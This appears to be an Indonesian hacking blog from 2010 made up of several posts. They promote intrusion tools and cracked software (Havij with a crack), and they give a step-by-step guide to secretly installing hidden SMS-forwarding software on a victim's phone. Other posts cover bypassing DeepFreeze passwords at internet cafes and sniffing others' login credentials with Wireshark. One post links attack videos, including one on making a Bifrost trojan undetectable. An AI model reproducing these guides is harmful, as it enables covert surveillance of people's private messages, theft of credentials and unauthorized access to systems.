Add-ons Mozilla Firefox for Hacking
Diposting oleh jhon sutaker Sabtu, 18 Desember 2010
Add-ons Mozilla Firefox for Hacking,, Tau kan apa itu Add-ons?? Add ons adalah seperti sebuah plugin/alat tambahan pada sebuah browser untuk mempermudahkan kita melakukan sesuatu atau suatu alat yang mempunyai fungsi khusus di sebuah browser. Banyak sekali add-ons di internet terutama untuk Mozilla firefox. Dan tentu saja banyak juga add-ons yang bisa anda gunakan untuk mempermudah sebuah aksi hacking..Anda dapat mendownload add-ons disini https://addons.mozilla.org/en-US/firefox/addon/
1. Free Ebook Search : untuk mencari e-book
2. Server Spy : melihat jenis server
3. Domain Finder : mencari data suatu domain
4. Who is : melihat detail situs
5. About This Site : melihat detail situs
6. Tix Now : mematikan timer rapidshare
7. Firebug : mengedit html, css, javascript di virtual hacking
8. XSS-Me : percobaan xss ke situs target
9. SQL Inject Me : percobaan SQL Injection ke situs target
10. Unhide Passwords : melihat password saat kita sniffing di LAN sendiri
11. Tab URL Copier : untuk mencopy paste URL
12. Who Are You? : Mencari data nama seseorang di internet
13. Zoom Fox : memperbesar gambar di web
14. Linkification : melihat http link target
15. XRays : melihat source code dengan tampilannya
16. Amazing Media Browser : mendownload file flash dengan cara hacking
17. Down Them All : mengambil banyak file html diserver target , IDM-nya
mozilla.
18. Download Helper : mendownload video hacking
19. Spamborg : untuk pendaftaran email tanpa iklan
20. FasterFox : untuk mempercepat firefox
21. Stylish : menghack stylish di wordpress.com
22. Aardvark : mendelete barner saat melihat source code situs
23. Flashblock : memblock file flash
24. Flash Killer : tidak menampilkan flash agar yang terlihat tulisan saja
25. HostIP.Info.Geolocation : sorot link dan sudah terlihat alamat situs
26. Live HTTP Header : menampilkan http header
27. Fire FTP : sebagai FTP untuk upload file ke situs target
28. View Cookies : untuk melihat cookies
29. Add N Edit Cookies : untuk mengedit cookies
30. IeView : untuk melihat gambar di internet explore
31. Anonymouser : membuat diri tidak terlihat
32. User Agent Switcher : menyamar menjadi browser laen
33. Yahoo! Mail Notifier : menyadap password yahoo
34. GMail Notifier : menyadap password gmail
35. Switch Proxy : mengganti proxy biar aman saat hacking
36. Reload Every : dapat digunakan untuk boom email target
37. Adblock Plus : untuk mengakses email dengan 3 profile
38. Hackbar : untuk mengetikkan URL yang sangat panjang
39. Calling ID Advisor : Bedah situs
40. Bandwidth Meter : untuk mengukur bandwidth kita
41. Advanced Dork: untuk pencarian google secara cepat dengan
advance operator
42. Cipherfox : memperlihatkan ssl / tls chipper dan key di status bar..
43. Java Console: Untuk menggunakan console via java
44. Copycode: mengijinkan kita untuk memilih text dan mengcopynya
secara html
45. Fire Encrypter: memberikan enkripsi / decripsi dan hashing waktu kita
hacking
46. FirePHP: mengijinkan untuk masuk firebug console menggunakan simple
PHP call..
47. Inline Code Finder For FireBug: Untuk mencari bug menggunakan firebug
48. Page Hacker: menambahkan tombol hack pada halaman yang terpilih
49. Password Hasher: untuk memperlihatkan password
50. Tinyurl Creator: untuk membuat url yang akan kita hack menjadi short
51. SQL Injection : untuk mengetest ketahanan suatu situs terhadap SQL
Injection
NB : Mungkin beberapa add-ons diatas sudah tidak aktif. Pokoknya coba di cek aja... okrekz
Download Tutorial SQL Injection
Diposting oleh jhon sutaker
Kepada sobat-sobat blogger..ehm..kali ini mau share tentang Tutorial SQL Injection,, filenya ada dalam bentuk document yang bisa anda download ..tapi apa sih sebenarnya pengertian SQL Injection itu sendiri,, SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.Dalam Ebook ini anda akan diperkenalkan apa itu SQL Injection,, Contoh SQL Injection seperti SQL Injection pada URL maupun pada script PHP…sampai dengan cara pencegahannya,, Jadi ebook yang satu ini bagus untuk untuk baca.sebagai salah satu bahan referensi..
Ingat..
Download : TutorialSQLInjection.doc
Havij 1.12 (For Sql Injection)
Diposting oleh jhon sutaker
Software yang satu ini benar-benar sangat praktis..yang perlu anda lakukan adalah mencari sebuah target dengan dork Sql..bila target vuln maka bisa dipastikan target sudah di tangan anda,, fitur dari software ini juga terbilang lengkap..ada Find Table admin sampai-sampai ada md5 crackernya lagi..jadi kita gak usah repot-repot cari web khusus untuk nge-crack hash md5.
Tapi bila anda ingin benar-benar bisa dalam Sql Injection saya sarankan agar anda belajar-lah secara manual teknik itu dan jangan terus tergantung pada software..apa-apa software, sedikit-sedikit software..bila kegiatan hacking anda selalu bergantung pada software anda hanya akan berada pada tahap lamer ataupun script kiddies saja..dan anda tak akan bisa berkembang,, tapi bagi anda yang baru belajar Sql Injection juga gak pa-pa untuk menggunakan software nie..hitung-hitung pengenalan Sql Injection.
Hacking itu adalah sebuah seni. Seni yang berkembang seiring perkembangan jaman. Dan akan terus berkembang selama masih ada system yang terbilang secure. Hacking bukan sekedar black hat or white hat, but hack is an Art…hehehe..cek ileh..gayanya kayak dah master aja..padahal masih newbie..ehehe..
Link : havij.v1.12-installer_and_crack.rar
Menyadap SMS
Diposting oleh jhon sutaker Selasa, 23 November 2010hehehehehehe . oke langsung saja.
syarat:
# HP adalah HP symbian. Baik HP anda maupun HP teman anda.
# Merek NOKIA
# Memiliki aplikasi simbyan smsanywherelite.sis
hp korban juga harus sama yah punya aplikasi simbyan smsanywherelite.sis
Ikuti instruksi berikut ini untuk menyadap dan sadap sms hp :
1. download smsanywherelite.sis untuk software menyadap.
direct link :
DOWNLOAD
kalau tidak bisa disitu, silahkan download di :
DOWNLOAD
2. Masukkan aplikasi symbian itu di HP anda dan korban
3. Begitu aplikasi ini diinstal, kamu tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Tapi justru itu keuntungannya jika digunakan sebagai alat sadap. Berarti sang target kan tidak tahu kalau diponselnya telah dipasangi aplikasi tersebut. Justru itu, teman anda tidak akan tahu kan kalo smsnya disadap? Karena aplikasi symbian ini belum mendukung GUI (Graphics User Interface).
4. Siapkan hp/ponsel korban anda
5. Siapkan HP anda yang akan menerima sms masuk dari korban anda.
6. Aktifkan aplikasi ini di ponsel korban kamu dengan mengetik format sms -[ SA(spasi)(password)(spasi)ON ]-. Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketikkan SA 123456 ON kirim sms ini ke nomor ponsel kedua/ponsel kamu. Untuk mematikannya, ketik SA 123456 OFF ke nomor yang sama.
7. Lalu, jika anda ingin menyadap lebih dari 5 hari..atau setiap sms masuk di hp korban akan selalu diteruskan ke hp anda, ketik sms ini di hp korban anda : SA(spasi)(password)(spasi)R1, misal SA 1234567 R1. Untuk mematikan fungsi ini ganti parameter di belakang “R” menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer kamu. Matikan fungsi ini dengan mengirim SMS SA 1234567 S0
8. Sekarang, setiap korban menerima dan mengirim sms..kamu akan mendapat terusannya sama persis dengan sms aslinya 36
selamat mencoba . . .
sumber : pusat hacking se-dunia
Kode Rahasia HP China
Diposting oleh jhon sutaker Kamis, 30 September 2010CHINESE MODELS
* Default user code: 1122, 3344, 1234, 5678
* Engineer mode: * # 110 * 01 #
* Pabrik mode: * # 987 #
* COM Aktifkan PORT * # 110 * 01 # – Device> – UART Set> -> PS Config -> ART1/115200
* Kembali ke pengaturan pabrik: * # 987 * 99 #
* LCD kontras: * # 369 #
* versi software: * # 800 #
* versi software: * # 900 #
* mengatur bahasa default: * # 0000 # Kirim
* Bahasa set BAHASA INGGRIS: * # 0044 # Kirim
* menetapkan bahasa Inggris (firmware baru): * # 001 # SendService kode BenQ:
* versi software: * # 300 #
* tes mode: * # 302 * 20040615 #
Layanan kode Pantech:
* SOFTWARE VERSI: * 01763 * 79837 #
* service menu: * 01763 * 476 #
* reset default (telepon / kode pengguna reset ke default): * 01763 * 737381 #
* Layanan kode 3xx, 5xx:
* versi software: * # 79 #
* versi software: * # 837 #
Layanan kode VK200, VK2000, VK2010, VK2020, VK4000:
* versi software: * # 79 #
* SERVICE MENU: * # 9998 * 8336 # (terus #)
* default reset (telepon / kode pengguna reset ke default): * # 9998 * 7328 # (terus #)
kode Layanan LG:
* versi software: 2945 # * #
Layanan codes Fly:
* 2040 (i) reset defaults: * # 987 * 99 # Kirim
* MX200 reset defaults: * # 987 * 99 # Kirim
* MX200 software version: * # 900 # Kirim
* SL300m reset defaults: * # 987 * 99 # Kirim
* SL300m versi software: * # 900 # Kirim
* SL500m reset defaults: * # 987 * 99 # Kirim
* SL500m versi software: * # 900 # Kirim
* MP500 reset defaults: * # 987 * 99 # Kirim
* MP500 versi software: * # 900 # Kirim
* Menetapkan bahasa ke Bahasa Inggris: * # 0044 #
* Atur bahasa Rusia: * # 0007 #
kode Layanan Konka:
* C926 versi software: * 320 # Kirim
* C926 menetapkan bahasa default: * # 0000 # Kirim
* C926 menetapkan bahasa Inggris: * # 0044 # Kirim
kode Layanan GSTAR:
* GM208 (Cina Nokea 6230 +) engineering menu: * # 66 * #
* Menetapkan bahasa ke Bahasa Inggris: * # 0044 #
* Atur bahasa Rusia: * # 0007 #
* GM208 (Cina Nokea 6230 +) engineering menu: * # 66 * #
* Menetapkan bahasa ke Bahasa Inggris: * # 0044 #
* Atur bahasa Rusia: * # 0007 #
kode Layanan Motofone-F3:
* Motofone perangkat lunak versi F3: ** 9999 * Kirim
* *** 300 * Set SIM Pin
* *** 310 * / *** 311 * Pin SIM ON | OFF
* *** 000 * Reset P’aturan pabrik
* *** 644 * Set Voicemail nomor
* *** 260 * / *** 261 Auto * tombol lock ON | OFF
* *** 510 * / *** 511 suara * Buatlah ON | MATI
* *** 160 * / *** 161 * Restricted Calling (Phonebook only) ON | OFF
* *** 200608 * Send: versi perangkat lunak
* *** 200606 * Send: software versi
* *** 200806 * Send: versi rakelmartins
* *** 250 * / *** 251 * nada tombol ON | OFF
* *** 470 * Pilih format waktu
* *** 500 * / *** 501 * Prepaid Balance Display ON | OFF
* *** 520 * Ubah bahasa
Layanan kode VK-Mobile 3xx, 5xx:
* versi software: * # 79 #
* versi software: * # 837 #
* layanan menu: * # 364 * 85 # (tahan #)
Layanan kode VK200, VK2000, VK2010, VK2020, VK4000:
* versi software: * # 79 #
* service menu: * # 9998 * 8336 # (terus #)
* default reset (telepon / kode pengguna reset ke default): * # 9998 * 7328 # (terus #)
==============================================
Semua Kode Ponsel Cina Dan pinouts
———————————————-
versi software: * # 300 #
tes mode: * # 302 * 20040615 #
Layanan kode Pantech:
versi software: * 01763 * 79837 #
service menu: * 01763 * 476 #
reset default (telepon / kode pengguna reset ke default): * 01763 * 737381 #
Layanan kode 3xx, 5xx:
versi software: * # 79 #
versi software: * # 837 #
Layanan kode VK200, VK2000, VK2010, VK2020, VK4000:
versi software: * # 79 #
service menu: * # 9998 * 8336 # (terus #)
default reset (telepon / kode pengguna reset ke default): * # 9998 * 7328 # (terus #)
Layanan codes Fly:
2040 (i) reset defaults: * # 987 * 99 # Kirim
MX200 reset defaults: * # 987 * 99 # Kirim
MX200 software version: * # 900 # Kirim
SL300m reset defaults: * # 987 * 99 # Kirim
SL300m versi software: * # 900 # Kirim
SL500m reset defaults: * # 987 * 99 # Kirim
SL500m versi software: * # 900 # Kirim
MP500 reset defaults: * # 987 * 99 # Kirim
MP500 versi software: * # 900 # Kirim
Menetapkan bahasa ke Bahasa Inggris: * # 0044 #
Atur bahasa Rusia: * # 0007 #
kode Layanan Konka:
C926 versi software: * 320 # Kirim
C926 menetapkan bahasa default: * # 0000 # Kirim
C926 menetapkan bahasa Inggris: * # 0044 # Kirim
kode Layanan GSTAR:
GM208 (Cina Nokea 6230 +) engineering menu: * # 66 * #
Menetapkan bahasa ke Bahasa Inggris: * # 0044 #
Atur bahasa Rusia: * # 0007 #
Motofone perangkat lunak versi F3: ** 9999 * Kirim
C113, C114, C115, C115i, C116, C117, C118 software version: # 02 # *
C138, C139, C140 software version: * # 02 #
C155, C156, C157 versi software: * # 02 #
C257, C261 software version: # 02 # *
V171, V172, V173 software version: # 02 # *
V175, V176, V176 versi software: * # 02 #
C168, W220 software version: * # ** 837 #
W208, W375 software version: * # 02 #
ZTE Mobile1-* 938 * 737381 #
2 – TELEPON AKAN DIPLAYED DIBUAT
3 – POWER OFF TELEPON ANDA DAN POWER ON LAGI
alcatelE205
unlocking kode telepon, tekan hanya *** 847 # tanpa simcardE900 versi software: * # 5002 * 8376263 #
E900 penuh reset: * 2767 * 3855 #
kode Layanan Spice:
S404 mengaktifkan port COM: * # 42253646633 # – Device> -> Set UART -> PS -> UART1/115200
S410 engineer mode: * # 3646633 #
S900 software version: * # 8375 #
S900 serial no: * # 33778 #
Layanan kode Philips:
$ 200 mengaktifkan port COM: * # 3338913 # – Device> -> Set UART -> PS -> UART1/115200
kode Layanan “Cina” model:
default user code: 1122, 3344, 1234, 5.678
Engineer mode: * # 110 * 01 #
Pabrik mode: * # 987 #
Aktifkan COM port: * # 110 * 01 # – Device> -> Set UART -> PS Config -> UART1/115200
Kembali ke pengaturan pabrik: * # 987 * 99 #
LCD kontras: * # 369 #
versi software: * # 800 #
versi software: * # 900 #
Layanan kode BenQ:
versi software: * # 300 #
tes mode: * # 302 * 20040615 #
Goolag Scanner
Diposting oleh jhon sutaker Senin, 20 September 2010Sebuah grup hacker yang menamakan diri ‘Cult of the Dead Cow’, merilis sebuah tool gratis bernama Goolag. Goolag diklaim memudahkan para hacker melancarkan aksinya dengan memanfaatkan situs mesin cari populer yaitu Google.
Goolag merupakan sebuah hacker tools yang berguna untuk mencari kelemahan suatu website dengan memanfaatkan Google. Seperti kita ketahui sebelumnya bahwa mesin pencari Google sering dimanfaatkan para attacker untuk melancarkan aksinya seperti mencari kelemahan suatu website, mendapatkan username dan password, mencari direktori sensitif, mencari data-data penting suatu perusahaan sampai dengan pencurian kartu kredit pun dapat dilakukan hanya dengan memanfaatkan Google.
Sebenarnya scanner seperti Goolag ini telah banyak bermunculan sebelum Goolag muncul. Bahkan ada beberapa tools scanner yang memanfaatkan google ini merupakan buatan anak indonesia. Namun Goolag diprediksi akan lebih populer bila dibandingkan dengan scanner lain yang memanfaatkan google dikarenakan penciptanya merupakan sebuah group hacker legendaris yang cukup terkenal pada akhir tahun 90-an. Group ini juga pernah membuat sebuah hacker tools yang cukup populer yaitu BACK ORIFICE yang bisa dipergunakan untuk menembus komputer dengan sistem operasi Microsoft Windows.
Goolag merupakan sebuah software open source yang dapat dengan bebas di kembangkan dan didistribusikan. User interfce Goolag sangat sederhana, dan dapat dengan mudah di gunakan bahkan oleh seorang pemula dalam dunia sekuriti. Untuk dapat berjalan dengan baik Goolag membutuhkan .NET Framework Version 2.0. Software dapat anda dowload di sini.
Berikut saya berikan tampilan user interface dari Goolag
Dari beberapa scanner yang memanfaatkan google yang pernah saya gunakan, menurut saya Goolag adah yang terbaik… Pada versi diatas Goolag menyediakan 1418 Google Dork yang dapat digunakan para attacker melancarkan aksinya. Dork tersebut masih bisa kita tambah dan kurangi sendiri dengan menggunakan sebuah file yang berisi berbagai dork lain yang disimpan dalam sebuah file dengan format *.XML
Demikianlah informasi tentang Goolag yang dapat saya berikan, semoga bermanfaat bagi teman-teman.
note:
Untuk dapat menggunakannya matikan antivirus anda.
Sumber : Kill9 Crew
IMD Portable
Diposting oleh jhon sutaker Kamis, 16 September 2010
Seperti yg anda ketahui, Internet Download Manager/IDMan/IDM merupakan salah satu software download manager yg sangat powerfull dan terkenal. Seperti postingan saya sebelumnya IDM merupakan suatu alat untuk menaikan kecepatan pada saat proses download.
Kelebihan lainnya yaitu IDM dapat menunda dan melanjutkan kembali file yg sedang didownload tanpa merusak file tersebut, dan IDM berperan penting dalam mengurangi error/kesalahan yg terjadi pada saat proses download berlangsung yg disebabkan oleh koneksi yg tidak stabil.
SilakanDownload IDM Portable : klik disini.
Tapi pada posting kali ini saya memberikan IDM PORTABLE.
Terus apa bedanya dengan IDM biasa??
Pada versi portable, yg membedakanya adalah software/program ini tidak memerlukan proses instalasi, anda cukup dengan meng-copy foldernya dan mem-paste-kannya ketempat yg anda inginkan.
Anda juga dapat menaruh IDM portable kedalam flash disk, dengan begitu anda dapat menggunakan IDM di warnet, kantor, dan dimanapun anda berada.
Lalu anda tinggal menjalankan IDM.exe, dan secara otomatis IDM akan melakukan penyesuaian dengan browser yg terdapat dikomputer tersebut, seperti Mozilla Firefox, Internet explorer dan lainnya.
Beberapa kumpulan Password cracker Yang sering digunakan
Diposting oleh jhon sutaker| Software | Ukuran | Keterangan |
| Advanced ARJ Password Recovery | 730 Kb | Program yang dapat digunakan untuk mendapatkan password pada file ARJ. |
| Advanced Access Password Recovery | 500 KB | Program yang dapat digunakan untuk mendapatkan password pada file Microsoft Access 95/97. |
| Advanced ZIP Password Recovery | 1 Mb | Program yang dapat digunakan untuk mendapatkan password pada file Zip. |
| Accp-97 | 66 Kb | Program kecil untuk membuka password pada Microsoft Access 97 |
| Bhaskara | 140 Kb | Program ini dapat digunakan untuk mendapatkan password dari folder yang disharing. |
| Anti Screen Saver | 91 Kb | Sesuai dengan namanya, program ini digunakan untuk mendapatkan password screen saver pada Windows 95/98 |
| Zip Cracker | 1,7 Mb | Anda memberi password pada file *.zip dan lupa passwordnya ? Don’t worry, dengan program ini Anda bisa mendapatkan kembali password tersebut. |
| Advanced Office 97 PR | 800 Kb | Anda pernah membuka suatu file dokumen di Office 97, misalnya Word/Excel, dan saat itu ditanya password ? Mungkin Anda lupa passwordnya atau ada orang lain yang sengaja memberi password sehingga Anda tidak bisa membukanya. Jangan kuatir, dengan program ini Anda bisa mengetahui password yang dipasang pada file tersebut. |
| !Bios | 48 Kb | Digunakan untuk mengcrack password BIOS. Dilengkapi dengan source code dalam assembly dan pascal. |
| AW Crack | 5 Kb | Digunakan untuk mengcrack password BIOS khususnya Award Modular. |
| Kill CMOS | 5 Kb | Digunakan untuk me-reset setting pada BIOS. Bila Anda lupa dengan password BIOS Anda, bisa gunakan software ini. |
Semoga bermanfaat,
Referensi : http://info-ti.com/informasi/password-cracker.html
Portable Rapid Hacker v3.7 Final
Diposting oleh jhon sutaker Rabu, 15 September 2010Instruksi :
- Paste link Rapidshare
- Pilih ”Go”
- Pilih tombol ”FREE” pada halaman Rapidshare
Copy atau Paste situs Rapidshare site dan dapatkan Download tanpa batas.
Setelah Anda Paste link Rapidshare, pilih ”Go”
Pilih di laman Rapidshare, tekan tab 14 kali
tekan Enter jika Anda tidak ingin menggulung The Free Button
OS : Windows 2000/XP/2003/Vista
Ukuran : 2,3 MB
Download here Portable Rapid Hacker v3.7 Final.rar
Jebol DeepFreeze v.6
Diposting oleh jhon sutaker Sabtu, 28 Agustus 2010Mengapa saya katakan serupa tai tak sama?? karena kita menggunakan tools yang bernama Uninstal Deep Freeze, bukan anti deep freeze. Fungsi tools ini sama kok, yaitu menjebol password deep freeze. Lumayan buat kalau di warnet, Hehehe
Cara Menggunakan nya :
Klik login, lalu tunggu sampai tombol crack aktif.

Kalau udah aktif, klik crack.
Tekan CTRL+Alt+Shift+F6 bersamaan.
Pilih Boot thawed. (Nggak usah masukan password)
Restart.
100 Testes n Worked..!!!
LinK Download : UDF.rar
Cara sniffing password dengan wireshark
Diposting oleh jhon sutaker Senin, 16 Agustus 2010ni silahkan lihat artikelya
setelah seseorang loginpada sebuah acount
Buka program wireshark.
Pertama masuk pada Capture – Option atau menekan tombol Capture Interfaces
Kemudian akan muncul tampilan window Capture Interfaces. Pilih Option pada Ethernet yang terpakai / yang tersambung dengan jaringan dalam kasus ini, Option pada 802.11 b+g Wireless LAN
Pilih interface (network card) yang akan digunakan untuk mengcapture packet. Pilih salah satu yang benar. Dalam kasus ini saya menggunakan USB Wifi sebagai sambungan ke internet maka yang saya pilih adalah 802.11 b+g.
Dan pastikan Capture packet in promecious dalam status ON.
Untuk menyimpan record yang tercapture, bisa mengaktifkan kolom File, pada bagian Capture File(s).
Pilih tombol Start untuk memulai merecord packet data yang masuk
Pertama-tama mungkin blom ada record yang masuk. Kembali ke halaman admin blog uad, dan tekan lah tombol LOGIN nya. Maka akan ada packet yang terecord
Klik tombol stop ( Alt+E ) setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start. Pasti akan ada banyak sekali packet data yang merecord. Dari sini kita mulai menganalisa packet tersebut. Karena yang kita butuhkan adalah men-sniffing password, maka pada kolom Filter kita ketikkan http untuk lebih memudahkan pengelompokan packet data.
Biasanya login packet terdapat kata login atau sejenisnya. Dalam kasus ini kita menemukan packet dengan informasi POST /latif_ilkom/wp-login.php HTTP/1.1 …. Klik kanan pada packet tersebut, pilih Follow TCP Stream
Maka akan muncul informasi tentang packet data yang kita pilih. Disini lah kita bisa menemukan username dan password dari halaman administrator blog uad. Biasanya ditanda dengan tulisan berwarna merah.
Jika kita bisa menganalisa packet tersebut satu per satu maka kita akan tau data yang kita cari. Dalam kasus ini terlihat bahwa username=latif_ilkom dengan password rahasia sudah kita temukan
10 TOOL FAVORIT HACKER
Diposting oleh jhon sutaker- Koneksi keluar dan masuk melalui protokol UDP ataupun TCP dengan port yang digunakan..
- Tunneling mode, tunneling dari UDP ke TCP, memetakan parameter dalam jaringan (source port/interface, listening port/interface, dan mengijinkan remote host melakukan koneksi ke tunnel)
- Port scanner, untuk mendeteksi port yang terbuka.
- Buffered send-mode dan hexdump RFC854 telnet.
Tutorial Hacking
Diposting oleh jhon sutaker Minggu, 01 Agustus 2010Remote SQL Injection Exploit
Code:
http://rapidshare.com/files/11156227/100_live585.rar
2. NetBios Live Hack (5mb)
Shows how to use Super Scan to Hack Netbios opened on remote PC (Port 139)
Code:
3. Classified (7mb)
Shows how site classified is Hacked.
Code:
http://rapidshare.com/files/11158779/102_site585.rar
4. NASA (2mb)
NASA Department website Hacked.
Code:
http://rapidshare.com/files/11158865/92_meh.zip
5. Linux Network Monitor (5mb)
This video shows you how to set up ntop, a network monitoring program, on GNU/Linux. Ntop features a web interface that displays tons of information about bandwidth utilization, traffic patterns, etc. It even shows you what applications are using bandwidth on your network such as ftp, bittorrent, http, dns, etc.
Code:
http://rapidshare.com/files/11158774/95_CBT4Free-Linux_Network_Monitor.zip
6. Linux DNS Server (11mb)
This video explains how to set up a DNS server on a GNU/Linux server. In the video I explain a little bit about how DNS works, then I install and configure BIND in a chroot jail on 2 DNS servers in a master/slave relationship. This video is specifically tailored to setting up DNS for a web server.
Code:
7. Windows Web Server (6mb)
This video details the installation and configuration of Apache, MySQL, and PHP on Windows. This video is made specifically or those using Windows 2000 Pro, Windows XP Home, or Windows XP Pro.
Code:
http://rapidshare.com/files/11158787/98_Windows_Web_Server.zip
8. Win Server 2003 IIS and DNS (4mb)
This video shows how to install and configure IIS and DNS on Windows Server 2003 for virtual hosting. These procedures will work with all versions of Windows Server 2003 and possibly with Windows 2000 Server.
Code:
http://rapidshare.com/files/11158780/99_Windows_Server_2003_IIS_and_DNS.zip9. Hacker Defender Movie (8mb)
Shows how Brilliant Hacker defender bypasses several rootkits detectors. You can see bypassing IceSword, BlackLight, RootkitRevealer and more.
Code:
http://rapidshare.com/files/11158766/90_Brilliant_Hacker_defender_presentation_movie_MSV1.rar
10. 0-DAY Simple SQL Injection (8mb)
A film project about a cracker with the name zer0day. (Hacking with Linux -php)
Code:
http://rapidshare.com/files/11158799/89_simple-sql-injection.zip
11. wbb (10mb)
wbb portal hacked by XSS.
Code:
http://rapidshare.com/files/11158816/82_wbb_portal.rar
12. Reverse Engineering (20mb)
Reverse Engineering with LD PRELOAD
Code:
http://rapidshare.com/files/11158857/83_reverse.rar
13. SWF File Vulnerability
Multiple Websites Embedded SWF File Vulnerability Demonstration
Code:
http://rapidshare.com/files/11158813/84_SWF_Vul_Demo.rar
14. IPB 1.3 SQL (10mb)
Invasion Power Board 1.3 SQL Injection Exploit
Code:
http://rapidshare.com/files/11158768/86_IPB_SQL.rar
15. Qnix Buffer Overflows (11mb)
Qnix Demonstrating Exploration of Simple Buffer Overflows
Code:
http://rapidshare.com/files/11158770/87_buff.rar
16. ASP SQL (5mb)
Simple ASP Administrator SQL Injection (5mb)
Code:
http://rapidshare.com/files/11158795/88_asp_sql.rar
17. Blind MySQL (9mb)
Demonstration of Blind MySQL Injection (bsqlbf)
Code:
http://rapidshare.com/files/11158804/77_Blind_MySQL.rar
18. D-Link Wireless (3mb)
Intruders D-Link Wireless Access Point Configuration Disclosure
Code:
http://rapidshare.com/files/11158777/78_D-Link_Wireless.rar
19. Mysql bftools (8mb)
Demonstration of Blind MySQL Injection (mysql_bftools)
Code:
http://rapidshare.com/files/11158798/79_mysql_bftools.rar
20. PHP Remote File (9mb)
PHP Remote File Inclusion Windows Backdoor.
Code:
http://rapidshare.com/files/11158805/80_PHP_Remote.rar
21. Cracking WEP in 10 Minutes (30mb)
A short demo of a wireless WEP attack. This is an interesting technique, where packets are injected to the access point, making it release weak IVs. You'll think twice about WEP after this
Code:
http://rapidshare.com/files/11158904/75_see-sec-wepcrack.zip
22. Tunneling Exploits via SSH (18mb)
An intensive demo showing how SSH Tunneling techniques can be used to exploit an interal, non routable network.
Code:
http://rapidshare.com/files/11158855/74_see-sec-ssh-dcom-tunneling.zip
23. A classic client side attack (18mb)
The MS06-001 vulnerability was used to execute a reverse connect shellcode. More information about this vulnerability can be found at the Microsoft site - MS06-001.
Code:
http://rapidshare.com/files/11158860/76_see-sec-client-side.rar
24. C++ Video tutorials (29mb)
Nice C/C++ Shockwave videos.
Code:
http://rapidshare.com/files/11158892/70_C__.rar
25. Interview with Kevin Mitnick (12mb)
He was on fbi's most wanted list, a nitrous Hacker but now see Kevin's Interview after being freed what he has to say about his past and future.
Code:
http://rapidshare.com/files/11158829/68_kevin.rar
26. Unix Shell Fundamentals (40mb)
VTC Unix Shell Fundamentals Video Tutorials. You need Quicktime player to view the videos.
Code:
http://rapidshare.com/files/11158906/69_UnixShellFund.rar
27. Microsoft.com Bugs
Nice videos shows of old bug that was exploited on the site.
Code:
28. Bitfrost Server Crypting (15mb)
This is nice video for any one learning how to add bytes to make there server undetectable. The rar Password is Crypt.
Code:
http://rapidshare.com/files/11164849/66_Bifrost_Server_Cryp.rar
29. WMF File Code Execution Vulnerability With Metasploit (38mb)
This video covers the use of the recent (Jan 2006) WMF file code execution vulnerability with Metasploit. It shows how to shovel a shell back to the attacker with the WMF vulnerability. See Microsoft Security Advisory 912840. Thanks to kn1ghtl0rd, AcidTonic, Electroman and livinded for their help.
Code:
30. SSH Dynamic Port Forwarding (30mb)
I set up a quick video tutorial to show how to set up an encrypted tunnel using SSH's dynamic port forwarding (sort of a poor man's VPN) in both Linux and Windows. The tools used are OpenSSH, PuTTY and Firefox, but it should be enough info to allow you to figure out how to set up other clients.
Code:
31. Using VMware Player to run Live CDs (Bootable ISOs) (46mb)
In this video I show how to use the free VMware Player to run Live CDs like Knoppix, Auditor or Bart's PE Builder from an ISO
Code:
http://rapidshare.com/files/11164810/52_vmwareplayerlivecd.swf
32. Adding Modules to a Slax or Backtrack Live CD from Windows (43mb)
Code:
33. Make your own VMs with hard drive for free: VMware Player + VMX Builder (16mb)
Code:
http://rapidshare.com/files/11164773/54_vmxbuilder.swf
34. Cracking Windows Passwords with BackTrack and the Online Rainbow Tables at Plain-Text.info (44mb)
Code:
35. Droop's Box: Simple Pen-test Using Nmap, Nikto, Bugtraq, Nslookup and Other Tools (67mb)
Code:
36. WiGLE, JiGLE and Google Earth: Mapping out your wardrive (72mb)
Code:
http://rapidshare.com/files/11164827/45_wigle1.swf
37. Finding Rogue SMB File Shares On Your Network (60mb)
Code:
38. Nmap Video Tutorial 2: Port Scan Boogaloo (13mb)
This video covers some intermediate and advanced Nmap options and is a follow-up to "Basic Nmap Usage" presentation.
Code:
38. Metasploit Flash Tutorial
This video covers the use of Metasploit, launched from the Auditor Boot CD, to compromise an unpatched Windows XP box by using the RPC DCOM (MS03-026) vulnerability. It then sends back a VNC session to the attacker. This is just one example of the many things Metasploit can do.
Code:
http://rapidshare.com/files/11164788/48_metasploit1.swf
39. Using VirtualDub and a cheap webcam as a camcorder (10mb)
I thought this might be of use to those that would like to submit something to Infonomicon TV or Hack TV but lack the cash for a proper MiniDV camcorder.
Code:
http://rapidshare.com/files/11164832/49_cheapcamcorder.avi
40. Cracking Syskey and the SAM on Windows Using Samdump2 and John (25mb)
Code:
Semua link tidak dimonitor kevalidannya (masih aktif/sudah mati). Jika sudah mati silahkan cari di google. Siapa tahu sudah ada yang upload ulang.
Google hack
Diposting oleh jhon sutakerAplikasi ini dirancang bagi yang ndak suka menhapal fasilitas pencarian di google. Misal link:, intitle:, inurl: dll
Jadi jangan berfikir kalo aplikasi ini buat ngehack google...
Tidak sama sekali...
Tools ini sebenernya sudah lama ada, tp saya coba posting,kalo ja ada yang butuh....
linux :
http://googlehacks.googlecode.com/files/GoogleHacks1.6.tar.gz
window :
http://googlehacks.googlecode.com/files/GoogleHacksSetup1.6.exe
Atau coba dech kunjungi : www.jimmyr.com/mp3_search.php
Happy searching.....
Surat Cinta Seorang Hacker
Diposting oleh jhon sutaker Jumat, 23 Juli 2010Seandainya hatimu adalah sebuah system,
ingin rasanya aku manfaatkan vulnerabilitiesmu, pake PHP injection Terus aku ls -la; find / -perm 777 -type d,sehingga aku tau kalo di hatimu ada folder yang bisa ditulisi atau adakah free space buat aku?. apa aku harus pasang backdor “Remote Connect-Back Shell”jadi aku tinggal nunggu koneksi dari kamu saja, biar aku tidak merana seperti ini.
Seandainya hatimu adalah sebuah system,
